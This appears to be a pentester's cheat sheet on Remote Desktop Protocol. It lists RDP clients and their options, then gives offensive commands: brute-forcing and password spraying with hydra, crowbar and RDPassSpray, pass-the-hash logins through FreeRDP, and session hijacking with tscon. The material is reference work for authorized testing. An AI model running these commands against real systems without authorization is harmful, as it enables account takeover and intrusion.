Remote Desktop Protocol (RDP)

Remote Desktop Protocol (RDP) is a protocol used to access a desktop with a graphical interface from another computer over a network connection.

🐊️ Port: 3389 (TCP or rarely UDP)

It can be used to transfer files too, if the server supports it.

RDP Clients Overview

RDP Using Microsoft Terminal Services Client

On Windows, there is the built-in client: mstsc.exe. It has a few options to reduce the quality and increase performance.

Click on Show options then Experience and select modem.

RDP Using rdesktop

There is rdesktop (1.2k ⭐).

$ rdesktop [...] -r disk:linux='/path/to/folder'

RDP Using FreeRDP

FreeRDP (10.1k ⭐) is a popular client that may be installed on many Linux distributions. There is a GUI called xfreerdp-gui (0.1k ⭐, 2020 🪦).

$ xfreerdp /u:username /p:password /v:IP
$ xfreerdp /u:username /pth:hash /v:IP
$ xfreerdp /dynamic-resolution +clipboard /timeout:50000 /cert:ignore /v:IP /u:x /p:y
$ xfreerdp [...] /drive:linux,/path/to/folder
$ xfreerdp [...] /drive:/usr/share/windows-resources,share

RDP Using Remmina

Remmina (2.1k ⭐) is a popular graphical RDP client. It's easy to use and it has as many useful features as the others do.

$ sudo apt install -y remmina
$ remmina # start it

Click on the + at the top-left to configure your RDP connections, such as if you want to share a shared folder or use a SSH tunnel to a pivot.

You can alternatively directly enter the IP then the credentials in the search bar of the main pane. Accept the certificate (if prompted).

In preferences, we are able to select a keyboard mapping. In the quality section, you can uncheck everything for every category.

Useful icons:

Home 🏠️: switch back to remmina main panel
Toggle Dynamic Resolution Update 🖼️: fit to your screen

📚 Navigate to \\tsclient\ to access the shared folder.

📚 You can create a SSH tunnel directly from Remmina configuration.

RDP Pentester Notes ☠️

Enumeration

Using nmap to run scripts

$ # nmap RDP cookies are leaving traces (--packet-trace)
$ sudo nmap -sV -sC -p 3389 --script rdp* IP

Foothold

The password may be weak and vulnerable to brute force.

$ hydra -L user.list -P password.list rdp://IP -V
$ crowbar -b rdp -s IP/32 -u username -C password.list -v -n 64

There is also RDPassSpray (0.6k ⭐).

$ python3 RDPassSpray.py -u username -p password -t IP:port
$ python3 RDPassSpray.py -U usernames.lst -p password -t IP:port
$ python3 RDPassSpray.py [...] -d domain
$ python3 RDPassSpray.py [...] -T rdp_servers.lst

Exploitation

RDP Session Hijacking: connect to another user session. On Windows, as admin, we can use tscon.

PS> tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}

On Windows Server prior to 2019 as a local administrator, we can use:

PS> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
PS> net start sessionhijack

Well-known CVEs

BlueKeep Vulnerability (2019, RCE, unstable/BSoD)

Additional Tools

rdp-sec-check.pl (0.2k ⭐, 2021 🪦)

👻 To-do 👻

Stuff that I found, but never read/used yet.

ms-wbt-server (Windows RDP implementation)
Network Level Authentication (NLA)

Remote Desktop Protocol (RDP) ¶

RDP Clients Overview ¶

RDP Using Microsoft Terminal Services Client ¶

RDP Using rdesktop ¶

RDP Using FreeRDP ¶

RDP Using Remmina ¶

RDP Pentester Notes ☠️ ¶

Enumeration ¶

Foothold ¶

Exploitation ¶

Well-known CVEs ¶

Additional Tools ¶

👻 To-do 👻 ¶